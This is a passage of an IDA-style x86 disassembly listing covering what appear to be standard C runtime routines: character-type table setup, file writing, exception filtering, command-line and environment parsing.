mov eax, 20202020h
mov ebx, ecx
shr ecx, 2
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_42AC21: ; CODE XREF: sub_42ABB1+51�j
inc edx
inc edx
mov al, [edx-1]
test al, al
jnz short loc_42ABFA
pop edi
pop ebx
loc_42AC2C: ; CODE XREF: sub_42ABB1+42�j
push 0
lea eax, [ebp+var_514]
push dword_631984
push dword_631768
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 1
call sub_42BADD
push 0
lea eax, [ebp+var_214]
push dword_631768
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push esi
push dword_631984
call sub_429BA7
push 0
lea eax, [ebp+var_314]
push dword_631768
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 200h
push dword_631984
call sub_429BA7
add esp, 5Ch
xor eax, eax
lea ecx, [ebp+var_514]
loc_42ACA7: ; CODE XREF: sub_42ABB1+135�j
mov dx, [ecx]
test dl, 1
jz short loc_42ACC5
or byte_631881[eax], 10h
mov dl, [ebp+eax+var_214]
loc_42ACBD: ; CODE XREF: sub_42ABB1+127�j
mov byte_631780[eax], dl
jmp short loc_42ACE1
; ---------------------------------------------------------------------------
loc_42ACC5: ; CODE XREF: sub_42ABB1+FC�j
test dl, 2
jz short loc_42ACDA
or byte_631881[eax], 20h
mov dl, [ebp+eax+var_314]
jmp short loc_42ACBD
; ---------------------------------------------------------------------------
loc_42ACDA: ; CODE XREF: sub_42ABB1+117�j
and byte_631780[eax], 0
loc_42ACE1: ; CODE XREF: sub_42ABB1+112�j
inc eax
inc ecx
inc ecx
cmp eax, esi
jb short loc_42ACA7
jmp short loc_42AD33
; ---------------------------------------------------------------------------
loc_42ACEA: ; CODE XREF: sub_42ABB1+1D�j
xor eax, eax
mov esi, 100h
loc_42ACF1: ; CODE XREF: sub_42ABB1+180�j
cmp eax, 41h
jb short loc_42AD0F
cmp eax, 5Ah
ja short loc_42AD0F
or byte_631881[eax], 10h
mov cl, al
add cl, 20h
loc_42AD07: ; CODE XREF: sub_42ABB1+174�j
mov byte_631780[eax], cl
jmp short loc_42AD2E
; ---------------------------------------------------------------------------
loc_42AD0F: ; CODE XREF: sub_42ABB1+143�j
; sub_42ABB1+148�j
cmp eax, 61h
jb short loc_42AD27
cmp eax, 7Ah
ja short loc_42AD27
or byte_631881[eax], 20h
mov cl, al
sub cl, 20h
jmp short loc_42AD07
; ---------------------------------------------------------------------------
loc_42AD27: ; CODE XREF: sub_42ABB1+161�j
; sub_42ABB1+166�j
and byte_631780[eax], 0
loc_42AD2E: ; CODE XREF: sub_42ABB1+15C�j
inc eax
cmp eax, esi
jb short loc_42ACF1
loc_42AD33: ; CODE XREF: sub_42ABB1+137�j
pop esi
leave
retn
sub_42ABB1 endp
; =============== S U B R O U T I N E =======================================
sub_42AD36 proc near ; CODE XREF: sub_42B1D5+9�p
; sub_42B22D+D�p ...
cmp dword_631994, 0
jnz short locret_42AD51
push 0FFFFFFFDh
call sub_42A95E
pop ecx
mov dword_631994, 1
locret_42AD51: ; CODE XREF: sub_42AD36+7�j
retn
sub_42AD36 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42AD52 proc near ; CODE XREF: sub_4245FD+2B�p
; sub_4245FD+A6�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp dword_63177C, 0
push edi
mov edi, [ebp+arg_0]
mov [ebp+arg_0], edi
jnz short loc_42AD76
push [ebp+arg_8]
push [ebp+arg_4]
push edi
call sub_4222F0
add esp, 0Ch
jmp short loc_42ADE9
; ---------------------------------------------------------------------------
loc_42AD76: ; CODE XREF: sub_42AD52+11�j
push esi
push 19h
call sub_428436
mov edx, [ebp+arg_8]
pop ecx
test edx, edx
jz short loc_42ADC3
mov ecx, [ebp+arg_4]
loc_42AD89: ; CODE XREF: sub_42AD52+63�j
mov al, [ecx]
dec edx
movzx esi, al
test byte_631881[esi], 4
mov [edi], al
jz short loc_42ADAD
inc edi
inc ecx
test edx, edx
jz short loc_42ADB9
mov al, [ecx]
dec edx
mov [edi], al
inc edi
inc ecx
test al, al
jz short loc_42ADBF
jmp short loc_42ADB3
; ---------------------------------------------------------------------------
loc_42ADAD: ; CODE XREF: sub_42AD52+46�j
inc edi
inc ecx
test al, al
jz short loc_42ADC3
loc_42ADB3: ; CODE XREF: sub_42AD52+59�j
test edx, edx
jnz short loc_42AD89
jmp short loc_42ADC3
; ---------------------------------------------------------------------------
loc_42ADB9: ; CODE XREF: sub_42AD52+4C�j
and byte ptr [edi-1], 0
jmp short loc_42ADC3
; ---------------------------------------------------------------------------
loc_42ADBF: ; CODE XREF: sub_42AD52+57�j
and byte ptr [edi-2], 0
loc_42ADC3: ; CODE XREF: sub_42AD52+32�j
; sub_42AD52+5F�j ...
mov eax, edx
dec edx
test eax, eax
pop esi
jz short loc_42ADDE
lea ecx, [edx+1]
xor eax, eax
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_42ADDE: ; CODE XREF: sub_42AD52+77�j
push 19h
call sub_428497
mov eax, [ebp+arg_0]
pop ecx
loc_42ADE9: ; CODE XREF: sub_42AD52+22�j
pop edi
pop ebp
retn
sub_42AD52 endp
; =============== S U B R O U T I N E =======================================
sub_42ADEC proc near ; CODE XREF: sub_424828+E�j
push ebx
push edi
push 2
xor ebx, ebx
call sub_428436
pop ecx
push 3
pop edi
cmp dword_632B00, edi
jle short loc_42AE60
push esi
loc_42AE04: ; CODE XREF: sub_42ADEC+71�j
mov eax, dword_631AE8
mov esi, edi
shl esi, 2
mov eax, [esi+eax]
test eax, eax
jz short loc_42AE56
test byte ptr [eax+0Ch], 83h
jz short loc_42AE28
push eax
call sub_422B65
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_42AE28
inc ebx
loc_42AE28: ; CODE XREF: sub_42ADEC+2D�j
; sub_42ADEC+39�j
cmp edi, 14h
jl short loc_42AE56
mov eax, dword_631AE8
mov eax, [esi+eax]
add eax, 20h
push eax
call dword_42F148 ; RtlDeleteCriticalSection
mov eax, dword_631AE8
push dword ptr [esi+eax]
call sub_4230B3
mov eax, dword_631AE8
pop ecx
and dword ptr [esi+eax], 0
loc_42AE56: ; CODE XREF: sub_42ADEC+27�j
; sub_42ADEC+3F�j
inc edi
cmp edi, dword_632B00
jl short loc_42AE04
pop esi
loc_42AE60: ; CODE XREF: sub_42ADEC+15�j
push 2
call sub_428497
pop ecx
mov eax, ebx
pop edi
pop ebx
retn
sub_42ADEC endp
; =============== S U B R O U T I N E =======================================
sub_42AE6D proc near ; CODE XREF: sub_424C37+A2�p
; sub_425014+95�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
cmp esi, dword_631AE0
jnb short loc_42AEBA
mov ecx, esi
mov eax, esi
sar ecx, 5
and eax, 1Fh
mov ecx, dword_6319E0[ecx*4]
lea eax, [eax+eax*8]
test byte ptr [ecx+eax*4+4], 1
jz short loc_42AEBA
push edi
push esi
call sub_42BE86
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push esi
call sub_42AED2
push esi
mov edi, eax
call sub_42BEE5
add esp, 14h
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_42AEBA: ; CODE XREF: sub_42AE6D+B�j
; sub_42AE6D+26�j
call sub_426528
mov dword ptr [eax], 9
call sub_426531
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
pop esi
retn
sub_42AE6D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42AED2 proc near ; CODE XREF: sub_42AE6D+38�p
; sub_42D6D7+86�p
var_414 = byte ptr -414h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 414h
push ebx
push esi
push edi
xor edi, edi
cmp [ebp+arg_8], edi
mov [ebp+var_8], edi
mov [ebp+var_10], edi
jnz short loc_42AEF2
loc_42AEEB: ; CODE XREF: sub_42AED2+169�j
xor eax, eax
jmp loc_42B058
; ---------------------------------------------------------------------------
loc_42AEF2: ; CODE XREF: sub_42AED2+17�j
mov eax, [ebp+arg_0]
sar eax, 5
lea ebx, ds:6319E0h[eax*4]
mov eax, [ebp+arg_0]
and eax, 1Fh
lea esi, [eax+eax*8]
mov eax, [ebx]
shl esi, 2
test byte ptr [eax+esi+4], 20h
jz short loc_42AF22
push 2
push edi
push [ebp+arg_0]
call sub_426D61
add esp, 0Ch
loc_42AF22: ; CODE XREF: sub_42AED2+40�j
mov eax, [ebx]
add eax, esi
test byte ptr [eax+4], 80h
jz loc_42AFF1
mov eax, [ebp+arg_4]
cmp [ebp+arg_8], edi
mov [ebp+var_4], eax
mov [ebp+arg_0], edi
jbe loc_42B02C
loc_42AF42: ; CODE XREF: sub_42AED2+E4�j
lea eax, [ebp+var_414]
loc_42AF48: ; CODE XREF: sub_42AED2+A8�j
mov ecx, [ebp+var_4]
sub ecx, [ebp+arg_4]
cmp ecx, [ebp+arg_8]
jnb short loc_42AF7C
mov ecx, [ebp+var_4]
inc [ebp+var_4]
mov cl, [ecx]
cmp cl, 0Ah
jnz short loc_42AF67
inc [ebp+var_10]
mov byte ptr [eax], 0Dh
inc eax
loc_42AF67: ; CODE XREF: sub_42AED2+8C�j
mov [eax], cl
inc eax
mov ecx, eax
lea edx, [ebp+var_414]
sub ecx, edx
cmp ecx, 400h
jl short loc_42AF48
loc_42AF7C: ; CODE XREF: sub_42AED2+7F�j
mov edi, eax
lea eax, [ebp+var_414]
sub edi, eax
lea eax, [ebp+var_C]
push 0
push eax
lea eax, [ebp+var_414]
push edi
push eax
mov eax, [ebx]
push dword ptr [eax+esi]
call dword_42F07C ; WriteFile
test eax, eax
jz short loc_42AFE6
mov eax, [ebp+var_C]
add [ebp+var_8], eax
cmp eax, edi
jl short loc_42AFB8
mov eax, [ebp+var_4]
sub eax, [ebp+arg_4]
cmp eax, [ebp+arg_8]
jb short loc_42AF42
loc_42AFB8: ; CODE XREF: sub_42AED2+D9�j
; sub_42AED2+11D�j
xor edi, edi
loc_42AFBA: ; CODE XREF: sub_42AED2+13F�j
; sub_42AED2+14A�j
mov eax, [ebp+var_8]
cmp eax, edi
jnz loc_42B055
cmp [ebp+arg_0], edi
jz short loc_42B02C
push 5
pop esi
cmp [ebp+arg_0], esi
jnz short loc_42B01E
call sub_426528
mov dword ptr [eax], 9
call sub_426531
mov [eax], esi
jmp short loc_42B027
; ---------------------------------------------------------------------------
loc_42AFE6: ; CODE XREF: sub_42AED2+CF�j
call dword_42F068 ; RtlGetLastWin32Error
mov [ebp+arg_0], eax
jmp short loc_42AFB8
; ---------------------------------------------------------------------------
loc_42AFF1: ; CODE XREF: sub_42AED2+58�j
lea ecx, [ebp+var_C]
push edi
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
push dword ptr [eax]
call dword_42F07C ; WriteFile
test eax, eax
jz short loc_42B013
mov eax, [ebp+var_C]
mov [ebp+arg_0], edi
mov [ebp+var_8], eax
jmp short loc_42AFBA
; ---------------------------------------------------------------------------
loc_42B013: ; CODE XREF: sub_42AED2+134�j
call dword_42F068 ; RtlGetLastWin32Error
mov [ebp+arg_0], eax
jmp short loc_42AFBA
; ---------------------------------------------------------------------------
loc_42B01E: ; CODE XREF: sub_42AED2+FE�j
push [ebp+arg_0]
call sub_4264B5
pop ecx
loc_42B027: ; CODE XREF: sub_42AED2+112�j
; sub_42AED2+181�j
or eax, 0FFFFFFFFh
jmp short loc_42B058
; ---------------------------------------------------------------------------
loc_42B02C: ; CODE XREF: sub_42AED2+6A�j
; sub_42AED2+F6�j
mov eax, [ebx]
test byte ptr [eax+esi+4], 40h
jz short loc_42B041
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 1Ah
jz loc_42AEEB
loc_42B041: ; CODE XREF: sub_42AED2+161�j
call sub_426528
mov dword ptr [eax], 1Ch
call sub_426531
mov [eax], edi
jmp short loc_42B027
; ---------------------------------------------------------------------------
loc_42B055: ; CODE XREF: sub_42AED2+ED�j
sub eax, [ebp+var_10]
loc_42B058: ; CODE XREF: sub_42AED2+1B�j
; sub_42AED2+158�j
pop edi
pop esi
pop ebx
leave
retn
sub_42AED2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B05D proc near ; CODE XREF: .text:00424FB8�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
call sub_42599D
mov esi, eax
push dword ptr [esi+50h]
push [ebp+arg_0]
call sub_42B19B
pop ecx
test eax, eax
pop ecx
jz loc_42B18E
mov ebx, [eax+8]
test ebx, ebx
mov [ebp+arg_0], ebx
jz loc_42B18E
cmp ebx, 5
jnz short loc_42B09E
and dword ptr [eax+8], 0
push 1
pop eax
jmp loc_42B197
; ---------------------------------------------------------------------------
loc_42B09E: ; CODE XREF: sub_42B05D+33�j
cmp ebx, 1
jz loc_42B189
mov ecx, [esi+54h]
mov [ebp+var_4], ecx
mov ecx, [ebp+arg_4]
mov [esi+54h], ecx
mov ecx, [eax+4]
cmp ecx, 8
jnz loc_42B17B
mov edx, dword_44BF28
mov ecx, dword_44BF2C
add ecx, edx
push edi
cmp edx, ecx
jge short loc_42B0F9
lea ecx, [edx+edx*2]
shl ecx, 2
loc_42B0D8: ; CODE XREF: sub_42B05D+97�j
mov edi, [esi+50h]
add ecx, 0Ch
and dword ptr [ecx+edi-4], 0
mov edi, dword_44BF28
mov ebx, dword_44BF2C
inc edx
add ebx, edi
cmp edx, ebx
jl short loc_42B0D8
mov ebx, [ebp+arg_0]
loc_42B0F9: ; CODE XREF: sub_42B05D+73�j
mov eax, [eax]
mov edi, [esi+58h]
cmp eax, 0C000008Eh
jnz short loc_42B10E
mov dword ptr [esi+58h], 83h
jmp short loc_42B16C
; ---------------------------------------------------------------------------
loc_42B10E: ; CODE XREF: sub_42B05D+A6�j
cmp eax, 0C0000090h
jnz short loc_42B11E
mov dword ptr [esi+58h], 81h
jmp short loc_42B16C
; ---------------------------------------------------------------------------
loc_42B11E: ; CODE XREF: sub_42B05D+B6�j
cmp eax, 0C0000091h
jnz short loc_42B12E
mov dword ptr [esi+58h], 84h
jmp short loc_42B16C
; ---------------------------------------------------------------------------
loc_42B12E: ; CODE XREF: sub_42B05D+C6�j
cmp eax, 0C0000093h
jnz short loc_42B13E
mov dword ptr [esi+58h], 85h
jmp short loc_42B16C
; ---------------------------------------------------------------------------
loc_42B13E: ; CODE XREF: sub_42B05D+D6�j
cmp eax, 0C000008Dh
jnz short loc_42B14E
mov dword ptr [esi+58h], 82h
jmp short loc_42B16C
; ---------------------------------------------------------------------------
loc_42B14E: ; CODE XREF: sub_42B05D+E6�j
cmp eax, 0C000008Fh
jnz short loc_42B15E
mov dword ptr [esi+58h], 86h
jmp short loc_42B16C
; ---------------------------------------------------------------------------
loc_42B15E: ; CODE XREF: sub_42B05D+F6�j
cmp eax, 0C0000092h
jnz short loc_42B16C
mov dword ptr [esi+58h], 8Ah
loc_42B16C: ; CODE XREF: sub_42B05D+AF�j
; sub_42B05D+BF�j ...
push dword ptr [esi+58h]
push 8
call ebx
pop ecx
mov [esi+58h], edi
pop ecx
pop edi
jmp short loc_42B183
; ---------------------------------------------------------------------------
loc_42B17B: ; CODE XREF: sub_42B05D+5C�j
and dword ptr [eax+8], 0
push ecx
call ebx
pop ecx
loc_42B183: ; CODE XREF: sub_42B05D+11C�j
mov eax, [ebp+var_4]
mov [esi+54h], eax
loc_42B189: ; CODE XREF: sub_42B05D+44�j
or eax, 0FFFFFFFFh
jmp short loc_42B197
; ---------------------------------------------------------------------------
loc_42B18E: ; CODE XREF: sub_42B05D+1C�j
; sub_42B05D+2A�j
push [ebp+arg_4]
call dword_42F190 ; UnhandledExceptionFilter
loc_42B197: ; CODE XREF: sub_42B05D+3C�j
; sub_42B05D+12F�j
pop esi
pop ebx
leave
retn
sub_42B05D endp
; =============== S U B R O U T I N E =======================================
sub_42B19B proc near ; CODE XREF: sub_42B05D+13�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov ecx, dword_44BF34
push esi
mov esi, [esp+4+arg_0]
cmp [edx], esi
push edi
mov eax, edx
jz short loc_42B1C2
lea edi, [ecx+ecx*2]
lea edi, [edx+edi*4]
loc_42B1B7: ; CODE XREF: sub_42B19B+25�j
add eax, 0Ch
cmp eax, edi
jnb short loc_42B1C2
cmp [eax], esi
jnz short loc_42B1B7
loc_42B1C2: ; CODE XREF: sub_42B19B+14�j
; sub_42B19B+21�j
lea ecx, [ecx+ecx*2]
lea ecx, [edx+ecx*4]
cmp eax, ecx
jnb short loc_42B1D0
cmp [eax], esi
jz short loc_42B1D2
loc_42B1D0: ; CODE XREF: sub_42B19B+2F�j
xor eax, eax
loc_42B1D2: ; CODE XREF: sub_42B19B+33�j
pop edi
pop esi
retn
sub_42B19B endp
; =============== S U B R O U T I N E =======================================
sub_42B1D5 proc near ; CODE XREF: .text:00424F7A�p
cmp dword_631994, 0
jnz short loc_42B1E3
call sub_42AD36
loc_42B1E3: ; CODE XREF: sub_42B1D5+7�j
push esi
mov esi, dword_631AE4
mov al, [esi]
cmp al, 22h
jnz short loc_42B215
loc_42B1F0: ; CODE XREF: sub_42B1D5+33�j
; sub_42B1D5+36�j
mov al, [esi+1]
inc esi
cmp al, 22h
jz short loc_42B20D
test al, al
jz short loc_42B20D
movzx eax, al
push eax
call sub_42D60C
test eax, eax
pop ecx
jz short loc_42B1F0
inc esi
jmp short loc_42B1F0
; ---------------------------------------------------------------------------
loc_42B20D: ; CODE XREF: sub_42B1D5+21�j
; sub_42B1D5+25�j
cmp byte ptr [esi], 22h
jnz short loc_42B21F
loc_42B212: ; CODE XREF: sub_42B1D5+52�j
inc esi
jmp short loc_42B21F
; ---------------------------------------------------------------------------
loc_42B215: ; CODE XREF: sub_42B1D5+19�j
cmp al, 20h
jbe short loc_42B21F
loc_42B219: ; CODE XREF: sub_42B1D5+48�j
inc esi
cmp byte ptr [esi], 20h
ja short loc_42B219
loc_42B21F: ; CODE XREF: sub_42B1D5+3B�j
; sub_42B1D5+3E�j ...
mov al, [esi]
test al, al
jz short loc_42B229
cmp al, 20h
jbe short loc_42B212
loc_42B229: ; CODE XREF: sub_42B1D5+4E�j
mov eax, esi
pop esi
retn
sub_42B1D5 endp
; =============== S U B R O U T I N E =======================================
sub_42B22D proc near ; CODE XREF: .text:00424F63�p
push ebx
xor ebx, ebx
cmp dword_631994, ebx
push esi
push edi
jnz short loc_42B23F
call sub_42AD36
loc_42B23F: ; CODE XREF: sub_42B22D+B�j
mov esi, dword_6313EC
xor edi, edi
loc_42B247: ; CODE XREF: sub_42B22D+30�j
mov al, [esi]
cmp al, bl
jz short loc_42B25F
cmp al, 3Dh
jz short loc_42B252
inc edi
loc_42B252: ; CODE XREF: sub_42B22D+22�j
push esi
call sub_422120
pop ecx
lea esi, [esi+eax+1]
jmp short loc_42B247
; ---------------------------------------------------------------------------
loc_42B25F: ; CODE XREF: sub_42B22D+1E�j
lea eax, ds:4[edi*4]
push eax
call sub_422F79
mov esi, eax
pop ecx
cmp esi, ebx
mov dword_631488, esi
jnz short loc_42B281
push 9
call sub_424FCB
pop ecx
loc_42B281: ; CODE XREF: sub_42B22D+4A�j
mov edi, dword_6313EC
cmp [edi], bl
jz short loc_42B2C4
push ebp
loc_42B28C: ; CODE XREF: sub_42B22D+94�j
push edi
call sub_422120
mov ebp, eax
pop ecx
inc ebp
cmp byte ptr [edi], 3Dh
jz short loc_42B2BD
push ebp
call sub_422F79
cmp eax, ebx
pop ecx
mov [esi], eax
jnz short loc_42B2B0
push 9
call sub_424FCB
pop ecx
loc_42B2B0: ; CODE XREF: sub_42B22D+79�j
push edi
push dword ptr [esi]
call sub_423260
pop ecx
add esi, 4
pop ecx
loc_42B2BD: ; CODE XREF: sub_42B22D+6C�j
add edi, ebp
cmp [edi], bl
jnz short loc_42B28C
pop ebp
loc_42B2C4: ; CODE XREF: sub_42B22D+5C�j
push dword_6313EC
call sub_4230B3
pop ecx
mov dword_6313EC, ebx
mov [esi], ebx
pop edi
pop esi
mov dword_631990, 1
pop ebx
retn
sub_42B22D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B2E6 proc near ; CODE XREF: .text:00424F5E�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp dword_631994, ebx
push esi
push edi
jnz short loc_42B2FD
call sub_42AD36
loc_42B2FD: ; CODE XREF: sub_42B2E6+10�j
mov esi, offset dword_6314EC
push 104h
push esi
push ebx
call dword_42F154 ; GetModuleFileNameA
mov eax, dword_631AE4
mov dword_631498, esi
mov edi, esi
cmp [eax], bl
jz short loc_42B322
mov edi, eax
loc_42B322: ; CODE XREF: sub_42B2E6+38�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
push edi
call sub_42B37F
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
lea eax, [eax+ecx*4]
push eax
call sub_422F79
mov esi, eax
add esp, 18h
cmp esi, ebx
jnz short loc_42B352
push 8
call sub_424FCB
pop ecx
loc_42B352: ; CODE XREF: sub_42B2E6+62�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_4]
lea eax, [esi+eax*4]
push eax
push esi
push edi
call sub_42B37F
mov eax, [ebp+var_4]
add esp, 14h
dec eax
mov dword_631480, esi
pop edi
pop esi
mov dword_63147C, eax
pop ebx
leave
retn
sub_42B2E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B37F proc near ; CODE XREF: sub_42B2E6+47�p
; sub_42B2E6+7D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_10]
mov eax, [ebp+arg_C]
push ebx
push esi
and dword ptr [ecx], 0
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov dword ptr [eax], 1
mov eax, [ebp+arg_0]
test edi, edi
jz short loc_42B3A9
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_42B3A9: ; CODE XREF: sub_42B37F+20�j
cmp byte ptr [eax], 22h
jnz short loc_42B3F2
loc_42B3AE: ; CODE XREF: sub_42B37F+58�j
; sub_42B37F+5F�j
mov dl, [eax+1]
inc eax
cmp dl, 22h
jz short loc_42B3E0
test dl, dl
jz short loc_42B3E0
movzx edx, dl
test byte_631881[edx], 4
jz short loc_42B3D3
inc dword ptr [ecx]
test esi, esi
jz short loc_42B3D3
mov dl, [eax]
mov [esi], dl
inc esi
inc eax
loc_42B3D3: ; CODE XREF: sub_42B37F+46�j
; sub_42B37F+4C�j
inc dword ptr [ecx]
test esi, esi
jz short loc_42B3AE
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_42B3AE
; ---------------------------------------------------------------------------
loc_42B3E0: ; CODE XREF: sub_42B37F+36�j
; sub_42B37F+3A�j
inc dword ptr [ecx]
test esi, esi
jz short loc_42B3EA
and byte ptr [esi], 0
inc esi
loc_42B3EA: ; CODE XREF: sub_42B37F+65�j
cmp byte ptr [eax], 22h
jnz short loc_42B435
inc eax
jmp short loc_42B435
; ---------------------------------------------------------------------------
loc_42B3F2: ; CODE XREF: sub_42B37F+2D�j
; sub_42B37F+A5�j
inc dword ptr [ecx]
test esi, esi
jz short loc_42B3FD
mov dl, [eax]
mov [esi], dl
inc esi
loc_42B3FD: ; CODE XREF: sub_42B37F+77�j
mov dl, [eax]
inc eax
movzx ebx, dl
test byte_631881[ebx], 4
jz short loc_42B418
inc dword ptr [ecx]
test esi, esi
jz short loc_42B417
mov bl, [eax]
mov [esi], bl
inc esi
loc_42B417: ; CODE XREF: sub_42B37F+91�j
inc eax
loc_42B418: ; CODE XREF: sub_42B37F+8B�j
cmp dl, 20h
jz short loc_42B426
test dl, dl
jz short loc_42B42A
cmp dl, 9
jnz short loc_42B3F2
loc_42B426: ; CODE XREF: sub_42B37F+9C�j
test dl, dl
jnz short loc_42B42D
loc_42B42A: ; CODE XREF: sub_42B37F+A0�j
dec eax
jmp short loc_42B435
; ---------------------------------------------------------------------------
loc_42B42D: ; CODE XREF: sub_42B37F+A9�j
test esi, esi
jz short loc_42B435
and byte ptr [esi-1], 0
loc_42B435: ; CODE XREF: sub_42B37F+6E�j
; sub_42B37F+71�j ...
and [ebp+arg_10], 0
loc_42B439: ; CODE XREF: sub_42B37F+19E�j
cmp byte ptr [eax], 0
jz loc_42B522
loc_42B442: ; CODE XREF: sub_42B37F+D0�j
mov dl, [eax]
cmp dl, 20h
jz short loc_42B44E
cmp dl, 9
jnz short loc_42B451
loc_42B44E: ; CODE XREF: sub_42B37F+C8�j
inc eax
jmp short loc_42B442
; ---------------------------------------------------------------------------
loc_42B451: ; CODE XREF: sub_42B37F+CD�j
cmp byte ptr [eax], 0
jz loc_42B522
test edi, edi
jz short loc_42B466
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_42B466: ; CODE XREF: sub_42B37F+DD�j
mov edx, [ebp+arg_C]
inc dword ptr [edx]
loc_42B46B: ; CODE XREF: sub_42B37F+18F�j
mov [ebp+arg_0], 1
xor ebx, ebx
loc_42B474: ; CODE XREF: sub_42B37F+FC�j
cmp byte ptr [eax], 5Ch
jnz short loc_42B47D
inc eax
inc ebx
jmp short loc_42B474
; ---------------------------------------------------------------------------
loc_42B47D: ; CODE XREF: sub_42B37F+F8�j
cmp byte ptr [eax], 22h
jnz short loc_42B4AE
test bl, 1
jnz short loc_42B4AC
xor edi, edi
cmp [ebp+arg_10], edi
jz short loc_42B49B
cmp byte ptr [eax+1], 22h
lea edx, [eax+1]
jnz short loc_42B49B
mov eax, edx
jmp short loc_42B49E
; ---------------------------------------------------------------------------
loc_42B49B: ; CODE XREF: sub_42B37F+10D�j
; sub_42B37F+116�j
mov [ebp+arg_0], edi
loc_42B49E: ; CODE XREF: sub_42B37F+11A�j
mov edi, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_10], edx
setz dl
mov [ebp+arg_10], edx
loc_42B4AC: ; CODE XREF: sub_42B37F+106�j
shr ebx, 1
loc_42B4AE: ; CODE XREF: sub_42B37F+101�j
mov edx, ebx
dec ebx
test edx, edx
jz short loc_42B4C3
inc ebx
loc_42B4B6: ; CODE XREF: sub_42B37F+142�j
test esi, esi
jz short loc_42B4BE
mov byte ptr [esi], 5Ch
inc esi
loc_42B4BE: ; CODE XREF: sub_42B37F+139�j
inc dword ptr [ecx]
dec ebx
jnz short loc_42B4B6
loc_42B4C3: ; CODE XREF: sub_42B37F+134�j
mov dl, [eax]
test dl, dl
jz short loc_42B513
cmp [ebp+arg_10], 0
jnz short loc_42B4D9
cmp dl, 20h
jz short loc_42B513
cmp dl, 9
jz short loc_42B513
loc_42B4D9: ; CODE XREF: sub_42B37F+14E�j
cmp [ebp+arg_0], 0
jz short loc_42B50D
test esi, esi
jz short loc_42B4FC
movzx ebx, dl
test byte_631881[ebx], 4
jz short loc_42B4F5
mov [esi], dl
inc esi
inc eax
inc dword ptr [ecx]
loc_42B4F5: ; CODE XREF: sub_42B37F+16E�j
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_42B50B
; ---------------------------------------------------------------------------
loc_42B4FC: ; CODE XREF: sub_42B37F+162�j
movzx edx, dl
test byte_631881[edx], 4
jz short loc_42B50B
inc eax
inc dword ptr [ecx]
loc_42B50B: ; CODE XREF: sub_42B37F+17B�j
; sub_42B37F+187�j
inc dword ptr [ecx]
loc_42B50D: ; CODE XREF: sub_42B37F+15E�j
inc eax
jmp loc_42B46B
; ---------------------------------------------------------------------------
loc_42B513: ; CODE XREF: sub_42B37F+148�j
; sub_42B37F+153�j ...
test esi, esi
jz short loc_42B51B
and byte ptr [esi], 0
inc esi
loc_42B51B: ; CODE XREF: sub_42B37F+196�j
inc dword ptr [ecx]
jmp loc_42B439
; ---------------------------------------------------------------------------
loc_42B522: ; CODE XREF: sub_42B37F+BD�j
; sub_42B37F+D5�j
test edi, edi
jz short loc_42B529
and dword ptr [edi], 0
loc_42B529: ; CODE XREF: sub_42B37F+1A5�j
mov eax, [ebp+arg_C]
pop edi
pop esi
pop ebx
inc dword ptr [eax]
pop ebp
retn
sub_42B37F endp
; =============== S U B R O U T I N E =======================================
sub_42B533 proc near ; CODE XREF: .text:00424F54�p
; sub_42CCB3+8C�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, dword_6315F0
push ebx
push ebp
mov ebp, dword_42F180
push esi
push edi
xor ebx, ebx
xor esi, esi
xor edi, edi
cmp eax, ebx
jnz short loc_42B581
call ebp ; dword_42F180
mov esi, eax
cmp esi, ebx
jz short loc_42B562
mov dword_6315F0, 1
jmp short loc_42B58A
; ---------------------------------------------------------------------------
loc_42B562: ; CODE XREF: sub_42B533+21�j
call dword_42F184 ; GetEnvironmentStringsA
mov edi, eax
cmp edi, ebx
jz loc_42B65C
mov dword_6315F0, 2
jmp loc_42B610
; ---------------------------------------------------------------------------
loc_42B581: ; CODE XREF: sub_42B533+19�j
cmp eax, 1
jnz loc_42B60B
loc_42B58A: ; CODE XREF: sub_42B533+2D�j
cmp esi, ebx
jnz short loc_42B59A
